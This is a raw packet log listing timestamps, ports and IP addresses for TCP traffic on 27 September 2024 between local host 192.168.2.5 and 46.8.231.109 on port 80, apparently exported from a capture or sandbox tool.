Sep 27, 2024 00:15:03.773854017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.773854017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.774198055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774207115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774216890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774254084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.774254084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.774256945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774295092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774298906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.774311066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774322033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774353981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.774360895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.774360895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.774399042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.775674105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775692940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775705099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775722980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.775733948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775744915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775755882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775765896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.775773048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.775773048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.775803089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776043892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776092052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776103020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776107073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776149988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776154041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776161909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776201963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776221991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776240110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776249886 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776271105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776273012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776295900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776324987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776393890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776405096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776415110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776424885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776469946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776469946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776485920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776496887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776549101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776633978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776643991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776654005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.776699066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.776699066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844248056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844273090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844280958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844319105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844322920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844327927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844337940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844393969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844393969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844398022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844405890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844449043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844588041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844597101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844639063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844644070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844682932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844691992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844722986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844731092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844732046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844732046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844738960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844769001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844779015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844799042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844799042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844832897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.844871044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.844871044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.852611065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852658987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852669001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852686882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.852699041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.852745056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852755070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852765083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852776051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.852807999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.852807999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853215933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853260040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853272915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853296995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853296995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853312969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853347063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853358984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853367090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853378057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853401899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853437901 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853471041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853481054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853491068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853522062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853545904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853589058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853600025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853614092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853630066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.853642941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853657961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.853761911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854353905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854371071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854379892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854403973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854433060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854459047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854470015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854479074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854490042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854506969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854512930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854548931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854548931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854670048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854720116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854729891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854736090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854810953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854911089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854923010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854933023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854943991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.854969025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.854991913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855190039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855201006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855211020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855248928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855283976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855299950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855310917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855320930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855325937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855325937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855331898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855340958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855370045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855408907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855423927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855437040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855446100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855498075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855498075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855508089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855519056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855529070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855581999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855581999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855616093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855626106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855635881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855645895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855670929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855681896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855695009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855705976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855715990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855717897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855742931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855767012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855782032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855798006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855843067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855871916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855890036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855951071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855952978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.855961084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.855999947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.856091022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.856106997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.856118917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.856129885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.856142998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.856178999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860505104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860515118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860573053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860595942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860640049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860651016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860663891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860676050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860686064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860692024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860694885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.860719919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860719919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860915899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.860985994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861017942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861053944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.861053944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.861104965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861114979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861134052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861151934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861162901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861172915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.861174107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.861174107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.861211061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862390995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862420082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862430096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862463951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862521887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862525940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862543106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862554073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862564087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862575054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862576008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862643003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862773895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862783909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862833977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862878084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862888098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862899065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862921953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862934113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862943888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.862946987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862946987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.862953901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863001108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863004923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863004923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863013029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863027096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863044024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863059044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863075018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863085985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863153934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863162994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863179922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863192081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863202095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863208055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863209963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863239050 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863368034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863372087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863399982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863425016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863430023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863430023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863435984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863454103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863465071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863470078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.863518000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.863518000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.931441069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931468964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931478977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931530952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931544065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931555986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931571007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.931648016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.931648016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.939400911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939451933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939464092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939517021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.939517021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.939536095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939547062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939558029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939568043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939584017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.939620972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.939888954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939914942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939924002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.939965963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.939965963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940030098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940040112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940049887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940063000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940073013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940088034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940099001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940109968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940150023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940150023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940167904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940185070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940196037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940215111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940242052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940253973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940264940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940274000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.940323114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.940323114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941195011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941225052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941237926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941262960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941262960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941276073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941293955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941303968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941313982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941323996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941359043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941359043 CEST	49708	80	192.168.2.5	46.8.231.109
